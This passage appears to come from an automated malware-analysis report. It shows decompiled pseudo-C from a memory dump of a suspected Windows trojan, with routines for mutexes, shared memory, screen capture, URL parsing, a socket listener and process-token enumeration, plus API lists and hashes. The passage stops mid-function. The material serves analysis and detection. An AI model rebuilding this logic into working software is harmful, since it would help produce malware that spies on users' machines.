    							E0041D150( &_v1600);
    							E00416E10(0x42eb70,  &_v1472,  *0x42e904,  &_v1704, 1);
    							_t74 = CreateMutexW(0x42e930, 0,  &_v1716);
    							__esi[5] = _t74;
    							if(_t74 == 0) {
    								goto L1;
    							} else {
    								E0041CD80(0x9878a222,  &_v1704, 1);
    								_t77 = CreateFileMappingW(0, 0x42e930, 4, 0, 0x3d09128,  &_v1716);
    								 *__esi = _t77;
    								if(_t77 == 0) {
    									goto L1;
    								} else {
    									_t78 = MapViewOfFile(_t77, 2, 0, 0, 0);
    									if(_t78 == 0) {
    										goto L1;
    									} else {
    										__esi[4] = _t78;
    										__esi[6] = _t78 + 0x128;
    										_t104 = 0;
    										_t131 = GetDC(0);
    										if(_t131 == 0) {
    											L22:
    											return _t104;
    										} else {
    											__esi[9] = 0;
    											__esi[0xa] = 0;
    											__esi[0xb] = GetDeviceCaps(_t131, 8);
    											_t83 = GetDeviceCaps(_t131, 0xa);
    											__esi[0xc] = _t83;
    											if(CreateCompatibleBitmap(_t131, __esi[0xb], _t83) == 0) {
    												_t85 = 0;
    											} else {
    												_push(0);
    												_push(0);
    												_t26 =  &(_t133[8]); // 0x42eec0
    												_push( &_v1736);
    												_t85 = E00419A20(_t84, _t131);
    											}
    											_t133[7] = _t85;
    											ReleaseDC(0, _t131);
    											if(_t133[7] == 0) {
    												goto L22;
    											} else {
    												_t87 = _v1736;
    												_t114 =  *(_v1736 + 0xe) >> 3;
    												_t133[0xe] = _t114;
    												_t116 = (_t114 & 0x000000ff) * _t133[0xb];
    												_t133[0xd] = _t116;
    												if((_t116 & 0x00000003) != 0) {
    													_t116 = (_t116 & 0xfffffffc) + 4;
    												}
    												_t133[0xd] = _t116;
    												E004107C0(_t87);
    												_t104 = 1;
    												if(_v24 != 1) {
    													goto L22;
    												} else {
    													_t104 = 0;
    													E0041D150( &_v828);
    													E0041D1B0( &_v1628);
    													_t41 =  &(_t133[0xf]); // 0x42eedc
    													E00410820(_t41, 0x42eb70, 0x10);
    													_t44 =  &(_t133[0x14]); // 0x42eef0
    													_t133[0x13] = _v1162;
    													E00410820(_t44,  &_v712, 0x102);
    													E0041CD80(0x1898b122,  &_v1756, 1);
    													_t98 = CreateMutexW(0x42e930, 0,  &_v1768);
    													_t133[0x58] = _t98;
    													if(_t98 == 0) {
    														goto L1;
    													} else {
    														_t132 = GetDC(0);
    														if(_t132 != 0) {
    															_t100 = CreateCompatibleDC(_t132);
    															_t133[0x55] = _t100;
    															if(_t100 != 0) {
    																_t102 = CreateCompatibleBitmap(_t132, 1, 1);
    																_t133[0x57] = _t102;
    																if(_t102 != 0) {
    																	_t103 = SelectObject(_t133[0x55], _t102);
    																	_t133[0x56] = _t103;
    																	if(_t103 != 0) {
    																		_t104 = 1;
    																	}
    																}
    															}
    															ReleaseDC(0, _t132);
    														}
    														goto L22;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}

    APIs
    • TlsAlloc.KERNEL32(0042EEA0,00000000,0000018C,00000000,77E49EB0,00000000), ref: 00426227
    • RegisterWindowMessageW.USER32(?,?,?,00000000), ref: 00426274
    • CreateEventW.KERNEL32(0042E930,00000001,00000000,?,?,?,00000001), ref: 004262BB
    • CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,00000001), ref: 00426304
    • CreateFileMappingW.KERNEL32(00000000,0042E930,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 00426339
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0042634F
    • GetDC.USER32(00000000), ref: 0042636B
    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0042638A
    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00426392
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Create$CapsDeviceFile$AllocEventMappingMessageMutexRegisterViewWindow
    • String ID: pB$pB$pB
    • API String ID: 2611066365-338011802
    • Opcode ID: ca055e7e8e6dbfaad50c1aff091f266435f75ee0aa6256b1a8504b8268de40b5
    • Instruction ID: e33113966422c0ab35d2d39a44073a2280f2bf20333fc5f0abbe02da57e1ab56
    • Opcode Fuzzy Hash: ca055e7e8e6dbfaad50c1aff091f266435f75ee0aa6256b1a8504b8268de40b5
    • Instruction Fuzzy Hash: 1B71C571640314AFD320EF61EC45FABB7E8EB85700F40492FF69296290D778E488CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E00424ED0() {
    				void* __ebx;
    				intOrPtr __edi;
    				void* __esi;
    				void* _t133;
    				void* _t134;
    				intOrPtr _t135;
    				void* _t136;
    				void* _t138;
    				void* _t139;
    				void* _t145;
    				void* _t149;
    				int _t155;
    				void* _t159;
    				char _t161;
    				void* _t163;
    				void* _t168;
    				intOrPtr _t169;
    				void* _t171;
    				void* _t177;
    				void* _t180;
    				void* _t183;
    				intOrPtr _t186;
    				void* _t188;
    				void* _t190;
    				intOrPtr _t191;
    				signed int _t193;
    				long _t196;
    				void* _t197;
    				void* _t198;
    				void* _t206;
    				signed int _t210;
    				intOrPtr _t212;
    				signed int _t214;
    				intOrPtr _t216;
    				void* _t222;
    				void* _t226;
    				intOrPtr _t227;
    				signed char _t233;
    				intOrPtr _t235;
    				struct _SYSTEMTIME _t240;
    				void* _t243;
    				intOrPtr _t245;
    				signed char _t249;
    				intOrPtr _t253;
    				void* _t259;
    				void* _t260;
    				void* _t261;
    				void* _t262;
    				void* _t265;
    				intOrPtr _t268;
    				void* _t272;
    				intOrPtr _t277;
    				void* _t278;
    				intOrPtr _t281;
    				void* _t282;
    				void* _t283;
    
    				_t281 =  *((intOrPtr*)(_t283 + 0x2e4));
    				_t210 = 0;
    				 *(_t283 + 0x1c) = 0;
    				 *((char*)(_t283 + 0x1b)) = 0xff;
    				EnterCriticalSection(0x42ee7c);
    				_t215 =  *0x42ee98;
    				if( *0x42ee98 != 0 &&  *0x42ee94 != 0 && E00424250(_t215, 0,  *((intOrPtr*)(_t281 + 8)),  *((intOrPtr*)(_t281 + 0xc))) != 0) {
    					_t196 = E0040C330();
    					 *(_t283 + 0x1c) = _t196;
    					if(_t196 != 0) {
    						_push( *0x42ee94);
    						_push(_t283 + 0x20);
    						_push(4);
    						if(E004242F0(0) == 0) {
    							E004107C0( *(_t283 + 0x1c));
    							_t206 =  *0x42d420; // 0x0
    							ReleaseMutex(_t206);
    							CloseHandle(_t206);
    						} else {
    							E0040C3F0( *(_t283 + 0x1c));
    						}
    					}
    					_t197 =  *0x42ee94;
    					if(_t197 != 0) {
    						HeapFree( *0x42e6d4, 0, _t197);
    					}
    					_t198 =  *0x42ee98;
    					if(_t198 != 0) {
    						HeapFree( *0x42e6d4, 0, _t198);
    					}
    					 *0x42ee94 = 0;
    					 *0x42ee98 = 0;
    				}
    				LeaveCriticalSection(0x42ee7c);
    				_t267 =  *((intOrPtr*)(_t281 + 0x40));
    				if( *((intOrPtr*)(_t281 + 0x40)) == 0) {
    					L49:
    					__eflags = _t210 & 0x00000001;
    					if((_t210 & 0x00000001) == 0) {
    						_t234 =  *(_t281 + 0x44);
    						__eflags =  *(_t281 + 0x44);
    						if(__eflags != 0) {
    							_push(0);
    							_push( *((intOrPtr*)(_t281 + 0xc)));
    							_push( *((intOrPtr*)(_t281 + 8)));
    							_t183 = E00424660(3, _t234, __eflags);
    							__eflags = _t183;
    							if(_t183 != 0) {
    								_t210 = _t210 | 0x00000001;
    								__eflags = _t210;
    								 *(_t283 + 0x18) = _t210;
    							}
    						}
    					}
    					__eflags =  *((intOrPtr*)(_t281 + 0x20)) - 0x21;
    					if( *((intOrPtr*)(_t281 + 0x20)) < 0x21) {
    						L62:
    						_t133 =  *(_t281 + 0x2c);
    						 *(_t283 + 0x1c) = 0;
    						__eflags = _t133;
    						if(_t133 == 0) {
    							L67:
    							_t134 =  *(_t281 + 0x34);
    							__eflags = _t134;
    							if(_t134 == 0) {
    								L76:
    								_t135 =  *((intOrPtr*)(_t283 + 0x17));
    								__eflags = _t135 - 0xff;
    								if(_t135 != 0xff) {
    									__eflags = _t135 - 1;
    									if(_t135 != 1) {
    										L83:
    										__eflags = _t210 & 0x00000008;
    										if((_t210 & 0x00000008) == 0) {
    											L118:
    											_t136 =  *(_t283 + 0x1c);
    											__eflags = _t136;
    											if(_t136 != 0) {
    												HeapFree( *0x42e6d4, 0, _t136);
    											}
    											__eflags = _t210 & 0x00000001;
    											if((_t210 & 0x00000001) == 0) {
    												_t268 =  *((intOrPtr*)(_t283 + 0x2ec));
    												_push(_t268);
    												_t138 = E00424750();
    												__eflags = _t138;
    												if(_t138 != 0) {
    													_t210 = _t210 | 0x00000002;
    													__eflags = _t210;
    												}
    												__eflags = _t210 & 0x00000010;
    												if((_t210 & 0x00000010) != 0) {
    													_push(_t268);
    													_t139 = E00424C30();
    													__eflags = _t139;
    													if(_t139 != 0) {
    														_t210 = _t210 | 0x00000004;
    														__eflags = _t210;
    													}
    												}
    											}
    											return _t210;
    										}
    										_t216 = _t281;
    										_t141 =  *(_t216 + 0x28);
    										 *((char*)(_t283 + 0x17)) = 0;
    										__eflags =  *(_t216 + 0x28);
    										if( *(_t216 + 0x28) != 0) {
    											__eflags = _t210 & 0x00000010;
    											if((_t210 & 0x00000010) == 0) {
    												__eflags =  *(_t216 + 0x20);
    												if( *(_t216 + 0x20) != 0) {
    													L117:
    													_t210 = _t210 & 0xfffffff7;
    													__eflags = _t210;
    													goto L118;
    												}
    												_t259 = _t283 + 0x20;
    												E004240C0(0xc, _t259);
    												_t145 = HeapAlloc( *0x42e6d4, 8, 0xe);
    												__eflags = _t145;
    												if(_t145 == 0) {
    													L100:
    													_t282 = _t145;
    													L101:
    													__eflags = _t282;
    													if(_t282 == 0) {
    														goto L117;
    													}
    													E004237D0(_t283 + 0x20);
    													_t260 = E00410AA0( *((intOrPtr*)( *((intOrPtr*)(_t283 + 0x2ec)) + 8)), 0,  *((intOrPtr*)( *((intOrPtr*)(_t283 + 0x2ec)) + 0xc)));
    													__eflags = _t260;
    													if(_t260 != 0) {
    														_t240 = _t283 + 0x94;
    														E00410870(_t148, _t240, 0, 0x3c);
    														_t212 =  *((intOrPtr*)(_t283 + 0x2ec));
    														 *((intOrPtr*)(_t283 + 0x9c)) = 0x3c;
    														_t155 = InternetCrackUrlA( *(_t212 + 8),  *(_t212 + 0xc), 0, _t240);
    														__eflags = _t155 - 1;
    														if(_t155 == 1) {
    															_t111 = _t155 + 9; // 0x9
    															E00424100(_t111, _t283 + 0x110);
    															E00424100(0xd, _t283 + 0x2c);
    															_t272 =  *(_t283 + 0x1c);
    															__eflags = _t272;
    															if(_t272 == 0) {
    																_t272 = 0x4032e8;
    															}
    															_t243 =  *(_t283 + 0x20);
    															__eflags = _t243;
    															if(_t243 == 0) {
    																_t243 = 0x4032e8;
    															}
    															_t222 =  *(_t212 + 0x10);
    															__eflags = _t222;
    															if(_t222 == 0) {
    																_t222 = 0x404afc;
    															}
    															__eflags =  *(_t283 + 0x18) & 0x00000001;
    															_t159 = _t283 + 0x2c;
    															if(( *(_t283 + 0x18) & 0x00000001) == 0) {
    																_t159 = 0x4032e8;
    															}
    															_push(_t282);
    															_push(_t272);
    															_push(_t243);
    															_push(_t222);
    															__eflags =  *((intOrPtr*)(_t283 + 0xa8)) - 4;
    															_push(_t159);
    															__eflags = ( *((intOrPtr*)(_t283 + 0xa8)) == 4) + 0xb;
    															_t161 = E0040D910(( *((intOrPtr*)(_t283 + 0xa8)) == 4) + 0xb, ( *((intOrPtr*)(_t283 + 0xa8)) == 4) + 0xb, _t260, 0, _t283 + 0x128, _t260);
    															_t283 = _t283 + 0x28;
    															 *((char*)(_t283 + 0x17)) = _t161;
    														}
    														HeapFree( *0x42e6d4, 0, _t260);
    													}
    													_t149 =  *(_t283 + 0x20);
    													__eflags = _t149;
    													if(_t149 != 0) {
    														HeapFree( *0x42e6d4, 0, _t149);
    													}
    													HeapFree( *0x42e6d4, 0, _t282);
    													__eflags =  *((char*)(_t283 + 0x17));
    													_t210 =  *(_t283 + 0x18);
    													if( *((char*)(_t283 + 0x17)) != 0) {
    														goto L118;
    													} else {
    														goto L117;
    													}
    												}
    												_push(9);
    												_t226 = _t259;
    												L99:
    												_push(_t226);
    												_push(_t145);
    												_t145 = E00410820();
    												goto L100;
    											}
    											_t282 = E00410E10(_t141,  *((intOrPtr*)(_t216 + 0x24)));
    											__eflags = _t282;
    											if(_t282 == 0) {
    												goto L117;
    											}
    											_t245 =  *((intOrPtr*)(_t283 + 0x2ec));
    											_t163 = 0;
    											__eflags =  *(_t245 + 0x28);
    											if( *(_t245 + 0x28) <= 0) {
    												goto L101;
    											} else {
    												goto L90;
    											}
    											do {
    												L90:
    												_t227 =  *((intOrPtr*)(_t163 + _t282));
    												__eflags = _t227 - 0x26;
    												if(_t227 != 0x26) {
    													__eflags = _t227 - 0x2b;
    													if(_t227 == 0x2b) {
    														 *((char*)(_t163 + _t282)) = 0x20;
    													}
    												} else {
    													 *((char*)(_t163 + _t282)) = 0xa;
    												}
    												_t163 = _t163 + 1;
    												__eflags = _t163 -  *(_t245 + 0x28);
    											} while (_t163 <  *(_t245 + 0x28));
    											goto L101;
    										}
    										_t261 = _t283 + 0x20;
    										E004240C0(0xb, _t261);
    										_t145 = HeapAlloc( *0x42e6d4, 8, 0xc);
    										__eflags = _t145;
    										if(_t145 == 0) {
    											goto L100;
    										}
    										_push(7);
    										_t226 = _t261;
    										goto L99;
    									}
    									L82:
    									_t210 = _t210 | 0x00000008;
    									__eflags = _t210;
    									 *(_t283 + 0x18) = _t210;
    									goto L83;
    								}
    								__eflags =  *((char*)(_t281 + 0x18)) - 1;
    								if( *((char*)(_t281 + 0x18)) != 1) {
    									L79:
    									__eflags = _t210 & 0x00000020;
    									if((_t210 & 0x00000020) == 0) {
    										goto L83;
    									}
    									goto L82;
    								}
    								__eflags =  *(_t281 + 0x28);
    								if( *(_t281 + 0x28) > 0) {
    									goto L82;
    								}
    								goto L79;
    							}
    							__eflags =  *_t134;
    							if( *_t134 == 0) {
    								goto L76;
    							}
    							E00424100(0x12, _t283 + 0xc8);
    							_t168 = E00411DC0(__eflags, _t283 + 0x24, _t283 + 0xc8,  *(_t281 + 0x34));
    							_t283 = _t283 + 0xc;
    							L70:
    							__eflags = _t168;
    							if(_t168 > 0) {
    								_t262 =  *(_t283 + 0x1c);
    								_t169 = E00412560(_t262, _t168 + _t168);
    								__eflags =  *0x42ee14 - _t169;
    								if( *0x42ee14 != _t169) {
    									_t210 = _t210 | 0x00000020;
    									__eflags = _t210;
    									 *0x42ee14 = _t169;
    									 *(_t283 + 0x18) = _t210;
    								} else {
    									__eflags = _t262;
    									if(_t262 != 0) {
    										HeapFree( *0x42e6d4, 0, _t262);
    									}
    									 *(_t283 + 0x1c) = 0;
    								}
    							}
    							goto L76;
    						}
    						__eflags =  *_t133;
    						if( *_t133 == 0) {
    							goto L67;
    						}
    						_t171 =  *(_t281 + 0x30);
    						__eflags = _t171;
    						if(_t171 == 0) {
    							goto L67;
    						}
    						__eflags =  *_t171;
    						if( *_t171 == 0) {
    							goto L67;
    						}
    						E00424100(0x11, _t283 + 0x178);
    						_push( *(_t281 + 0x30));
    						_t168 = E00411DC0(__eflags, _t283 + 0x28, _t283 + 0x178,  *(_t281 + 0x2c));
    						_t283 = _t283 + 0x10;
    						goto L70;
    					} else {
    						E004240C0(0x10, _t283 + 0x2c);
    						_t277 =  *((intOrPtr*)(_t281 + 0x1c));
    						_t177 = 0;
    						while(1) {
    							_t233 =  *((intOrPtr*)(_t277 + _t177));
    							_t249 =  *((intOrPtr*)(_t283 + _t177 + 0x2c));
    							__eflags = _t233 - _t249;
    							if(_t233 != _t249) {
    								break;
    							}
    							_t177 = _t177 + 1;
    							__eflags = _t177 - 0x21;
    							if(_t177 < 0x21) {
    								continue;
    							}
    							L59:
    							_t180 =  *((intOrPtr*)(_t277 + 0x21));
    							__eflags = _t180 - 0x3b;
    							if(_t180 == 0x3b) {
    								L61:
    								_t210 = _t210 | 0x00000010;
    								__eflags = _t210;
    								 *(_t283 + 0x18) = _t210;
    								goto L62;
    							}
    							__eflags = _t180;
    							if(_t180 != 0) {
    								goto L62;
    							}
    							goto L61;
    						}
    						__eflags = (_t233 & 0x000000ff) != (_t249 & 0x000000ff);
    						if((_t233 & 0x000000ff) != (_t249 & 0x000000ff)) {
    							goto L62;
    						}
    						goto L59;
    					}
    				}
    				_t265 = E00418BD0(0x4e25, 0x10000000, _t267);
    				if(_t265 == 0) {
    					L48:
    					_t210 =  *(_t283 + 0x18);
    					goto L49;
    				}
    				_t278 = E00418C20(_t265);
    				 *(_t283 + 0x20) = _t278;
    				if(_t278 == 0) {
    					goto L48;
    				}
    				_t186 =  *((intOrPtr*)(_t265 + 0xc));
    				if(_t186 < 2 ||  *((char*)(_t278 + _t186 - 1)) != 0 ||  *((char*)(_t278 + _t186 - 2)) != 0) {
    					L47:
    					HeapFree( *0x42e6d4, 0, _t278);
    					goto L48;
    				} else {
    					L19:
    					while(1) {
    						if( *(_t278 + 1) == 0) {
    							L41:
    							_t188 = 0;
    							__eflags = 0;
    							goto L42;
    							do {
    								do {
    									L42:
    									_t278 = _t278 + 1;
    									__eflags =  *((char*)(_t278 - 1));
    								} while ( *((char*)(_t278 - 1)) != 0);
    								__eflags =  *_t278;
    								if( *_t278 == 0) {
    									L46:
    									_t278 =  *(_t283 + 0x20);
    									goto L47;
    								}
    								_t188 = _t188 + 1;
    								__eflags = _t188 - 1;
    							} while (_t188 != 1);
    							continue;
    						}
    						_t190 =  *_t278 + 0xffffffdf;
    						if(_t190 > 0x3d) {
    							L33:
    							_t214 = 0;
    							L24:
    							_t235 =  *((intOrPtr*)(_t281 + 0xc));
    							_t253 =  *((intOrPtr*)(_t281 + 8));
    							_t191 = 0;
    							 *(_t283 + 0x2c) = 0x2a23;
    							 *(_t283 + 0x30) = _t278;
    							if(_t278 == 0 ||  *_t278 == 0) {
    								L27:
    								 *((intOrPtr*)(_t283 + 0x3c)) = _t235;
    								 *((intOrPtr*)(_t283 + 0x34)) = _t191;
    								 *((intOrPtr*)(_t283 + 0x38)) = _t253;
    								 *((intOrPtr*)(_t283 + 0x48)) = 1;
    								if(E00412090(_t283 + 0x2c) == 0) {
    									goto L41;
    								}
    								_t193 = _t214;
    								if(_t193 > 4) {
    									L40:
    									__eflags = _t214 - 2;
    									if(_t214 != 2) {
    										goto L46;
    									}
    									goto L41;
    								}
    								switch( *((intOrPtr*)(_t193 * 4 +  &M00425544))) {
    									case 0:
    										 *((char*)(__esp + 0x17)) = 0;
    										goto L40;
    									case 1:
    										L39:
    										 *((char*)(__esp + 0x17)) = 1;
    										goto L40;
    									case 2:
    										__esp + 0x58 = E00410870(__esp + 0x58, __esp + 0x58, 0, 0x3c);
    										__eax =  *(__ebp + 0xc);
    										__edx = __esp + 0x50;
    										__ecx = __esp + 0x1e4;
    										 *(__esp + 0x68) = __esp + 0x1e4;
    										__ecx =  *(__ebp + 8);
    										 *((intOrPtr*)(__esp + 0x60)) = 0x3c;
    										 *((intOrPtr*)(__esp + 0x74)) = __edi;
    										__eax = InternetCrackUrlA(__ecx,  *(__ebp + 0xc), 0, __esp + 0x50);
    										__eflags = __eax - 1;
    										if(__eax == 1) {
    											__eflags =  *(__esp + 0x64);
    											if( *(__esp + 0x64) > 0) {
    												__eax = __esp + 0x1e0;
    												__eax = E00423760(__esp + 0x1e0);
    											}
    										}
    										goto L40;
    									case 3:
    										_t44 = __esp + 0x18;
    										 *_t44 =  *(__esp + 0x18) | 0x00000001;
    										__eflags =  *_t44;
    										goto L39;
    								}
    							} else {
    								do {
    									_t191 = _t191 + 1;
    								} while ( *((char*)(_t191 + _t278)) != 0);
    								goto L27;
    							}
    						}
    						_t18 = _t190 + 0x425504; // 0x4032e8
    						switch( *((intOrPtr*)(( *_t18 & 0x000000ff) * 4 +  &M004254F0))) {
    							case 0:
    								_t214 = 1;
    								goto L23;
    							case 1:
    								goto L23;
    							case 2:
    								_t214 = 2;
    								goto L23;
    							case 3:
    								L23:
    								_t278 = _t278 + 1;
    								goto L24;
    							case 4:
    								goto L33;
    						}
    					}
    				}
    			}

    APIs
    • EnterCriticalSection.KERNEL32 ref: 00424EF1
    • ReleaseMutex.KERNEL32(00000000,00000004,?,?,00000000,00000000), ref: 00424F6E
    • CloseHandle.KERNEL32(00000000), ref: 00424F75
      • Part of subcall function 0040C3F0: HeapFree.KERNEL32(?,00000000,?,00000000,00000000), ref: 0040C45C
      • Part of subcall function 0040C3F0: ReleaseMutex.KERNEL32(00000000,00000000,00000000), ref: 0040C46A
      • Part of subcall function 0040C3F0: CloseHandle.KERNEL32(00000000), ref: 0040C471
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000), ref: 00424F8E
    • HeapFree.KERNEL32(?,00000000,?,00000000,00000000), ref: 00424FA2
    • LeaveCriticalSection.KERNEL32(0042EE7C), ref: 00424FB5
    • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004250E7
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 0042513D
      • Part of subcall function 0040C330: CreateMutexW.KERNEL32(0042E930,00000000,0042D490,74B05520,00000000), ref: 0040C37B
      • Part of subcall function 0040C330: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040C38A
      • Part of subcall function 0040C330: HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040C3B5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Free$Mutex$CloseCriticalHandleReleaseSection$AllocCrackCreateEnterInternetLeaveObjectSingleWait
    • String ID: #*$<$<
    • API String ID: 2903975631-1731024930
    • Opcode ID: f2ba173abd883aa1127000e151f33096780171e73e68ede20f3b5f64b862bbec
    • Instruction ID: 166662a23442c4c50d67f2e484584385e9eee6219332d99c00bd2da81ed5d545
    • Opcode Fuzzy Hash: f2ba173abd883aa1127000e151f33096780171e73e68ede20f3b5f64b862bbec
    • Instruction Fuzzy Hash: 4902D130B047609FD720DF21E840BABB7A5AB95344F94456EF9849B391C778DC82CB9E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 23%
    			E00407188(long __eax, intOrPtr* __ebx, intOrPtr* __edi, intOrPtr* __ebp, int _a4, long _a8, intOrPtr _a20, void* _a24, void* _a32, void* _a36, void* _a40, void* _a44, void* _a48) {
    				long _v28;
    				char _v32;
    				intOrPtr _v60;
    				long _t27;
    				intOrPtr _t34;
    				void* _t35;
    				void* _t41;
    				intOrPtr* _t42;
    				void* _t43;
    				intOrPtr* _t53;
    				intOrPtr _t56;
    				intOrPtr _t57;
    				intOrPtr _t58;
    				void* _t60;
    				intOrPtr* _t61;
    				void* _t64;
    
    				_t61 = __ebp;
    				_t53 = __edi;
    				_t42 = __ebx;
    				_t27 = __eax;
    				while(1) {
    					_t56 = _a20;
    					if(_t27 >= _t56) {
    						break;
    					}
    					_t34 =  *((intOrPtr*)(_t64 + 0x38 + _t27 * 4));
    					if(_t34 != _a44) {
    						if(_t34 == _a36) {
    							_a24 = _a32;
    						}
    					} else {
    						_a24 = _a40;
    					}
    					_t35 = _a24;
    					__imp__#1(_t35, 0, 0);
    					_t60 = _t35;
    					while(_t60 != 0xffffffff) {
    						 *_t53(_t60, 0, 0);
    						_a4 = 0;
    						 *_t42(_t60, 0x8004667e,  &_a4, 4, 0, 0,  &_a44, 0, 0);
    						_v32 = 1;
    						 *_t61(_t60, 6, 1,  &_v32, 4);
    						_t41 = CreateThread(0, 0x20000, E00406F20, _t60, 0,  &_v28);
    						if(_t41 == 0) {
    							L10:
    							if(_t60 != 0xffffffff) {
    								__imp__#22(_t60, 2);
    								__imp__#3(_t60);
    							}
    						} else {
    							_t41 = CloseHandle(_t41);
    							if(_v32 == 0) {
    								goto L10;
    							}
    						}
    						__imp__#1(_v60, 0, 0);
    						_t60 = _t41;
    					}
    					_t27 = WaitForMultipleObjects(_a8,  &_a44, 0, 0xffffffff);
    					if(_t27 != 0) {
    						continue;
    					}
    					break;
    				}
    				_t43 = _a48;
    				_t57 = _a40;
    				if(_t57 != 0xffffffff) {
    					__imp__#22(_t57, 2);
    					__imp__#3(_t57);
    				}
    				CloseHandle(_a44);
    				_t58 = _a32;
    				if(_t58 != 0xffffffff) {
    					__imp__#22(_t58, 2);
    					__imp__#3(_t58);
    				}
    				CloseHandle(_a36);
    				ReleaseMutex(_t43);
    				CloseHandle(_t43);
    				return 0;
    			}

    APIs
    • accept.WS2_32(?,00000000,00000000), ref: 004071C7
    • WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 004071DD
    • WSAIoctl.WS2_32(?,?,?,?,?,?,?,?,00000000), ref: 00407201
    • setsockopt.WS2_32(00000000,00000006,00000001,00000000,00000004), ref: 00407217
    • CreateThread.KERNEL32 ref: 0040722D
    • CloseHandle.KERNEL32(00000000), ref: 00407238
    • shutdown.WS2_32(00000000,00000002), ref: 0040724D
    • closesocket.WS2_32(00000000), ref: 00407254
    • accept.WS2_32(00000000,00000000,00000000), ref: 00407263
    • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 00407282
    • shutdown.WS2_32(?,00000002), ref: 004072A0
    • closesocket.WS2_32(?), ref: 004072A7
    • CloseHandle.KERNEL32(?), ref: 004072B8
    • shutdown.WS2_32(?,00000002), ref: 004072C6
    • closesocket.WS2_32(?), ref: 004072CD
    • CloseHandle.KERNEL32(?), ref: 004072D8
    • ReleaseMutex.KERNEL32(00000000), ref: 004072E3
    • CloseHandle.KERNEL32(00000000), ref: 004072EA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$closesocketshutdown$accept$CreateEventIoctlMultipleMutexObjectsReleaseSelectThreadWaitsetsockopt
    • String ID: p0u
    • API String ID: 1352971239-1742372003
    • Opcode ID: bdf2da715f5981b914212602e899309bbb50f3bc5310c22d2aed178986e4bec4
    • Instruction ID: 7b2ab4f4582c56943254c15caf3ac3269141f8068eb0b80c40cd2e3ada20e259
    • Opcode Fuzzy Hash: bdf2da715f5981b914212602e899309bbb50f3bc5310c22d2aed178986e4bec4
    • Instruction Fuzzy Hash: FA419931649310BBD310AB64DD49F5F77A8AB85720F100A69F652B72E0D774AC058B9F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00428230(void* __edx) {
    				long _v564;
    				char _v568;
    				void* _v572;
    				intOrPtr _v580;
    				long _v584;
    				void _v588;
    				void* _v592;
    				long _v596;
    				long _v600;
    				void* _v604;
    				char _v605;
    				void* _v608;
    				intOrPtr _v609;
    				long _v612;
    				char _v613;
    				void* _v616;
    				struct tagPROCESSENTRY32W* _t59;
    				signed int _t62;
    				void _t63;
    				void* _t73;
    				void* _t74;
    				signed char _t81;
    				void* _t84;
    				long _t88;
    				int _t95;
    				void* _t98;
    				void* _t100;
    				long _t102;
    				void* _t104;
    				long _t116;
    				signed char _t120;
    				void* _t125;
    				intOrPtr _t127;
    				void* _t128;
    				signed int _t131;
    				void _t133;
    				void* _t135;
    				void* _t136;
    				void* _t139;
    				long _t140;
    
    				_t125 = 0;
    				_t131 = 0;
    				_v605 = 0;
    				_v604 = 0;
    				_v600 = 0;
    				while(1) {
    					_t98 = CreateToolhelp32Snapshot(2, 0);
    					_v588 = _t98;
    					_v600 = 0;
    					if(_t98 == 0xffffffff) {
    						break;
    					}
    					_t59 =  &_v568;
    					_v568 = 0x22c;
    					Process32FirstW(_t98, _t59);
    					if(_t59 == 0) {
    						L47:
    						CloseHandle(_t98);
    						if(_v604 != 0) {
    							continue;
    						}
    						break;
    					}
    					_v588 = 8 + _t131 * 4;
    					do {
    						_t102 = _v564;
    						if(_t102 != 0 && _t102 !=  *0x42eb68) {
    							_t62 = 0;
    							if(_t131 == 0) {
    								L9:
    								_t63 = E0041CCB0(_t151, _t102);
    								_v588 = _t63;
    								if(_t63 == 0) {
    									goto L46;
    								}
    								_t139 = OpenProcess(0x400, 0, _v564);
    								if(_t139 == 0) {
    									L45:
    									CloseHandle(_v584);
    									goto L46;
    								}
    								_t100 = 0;
    								if(OpenProcessToken(_t139, 8,  &_v600) == 0) {
    									L22:
    									CloseHandle(_t139);
    									if(_t100 == 0) {
    										L44:
    										_t98 = _v592;
    										goto L45;
    									}
    									if(_v580 !=  *0x42e908) {
    										L43:
    										HeapFree( *0x42e6d4, 0, _t100);
    										_t131 = _v608;
    										_t125 = _v612;
    										goto L44;
    									}
    									_t140 = GetLengthSid( *_t100);
    									if(_t140 !=  *0x42e900) {
    										goto L43;
    									}
    									_t104 = 0;
    									if(_t140 == 0) {
    										L32:
    										_t133 = _v588;
    										_t73 = _v612;
    										_t116 = _t133 - 4;
    										if(_t116 != 0) {
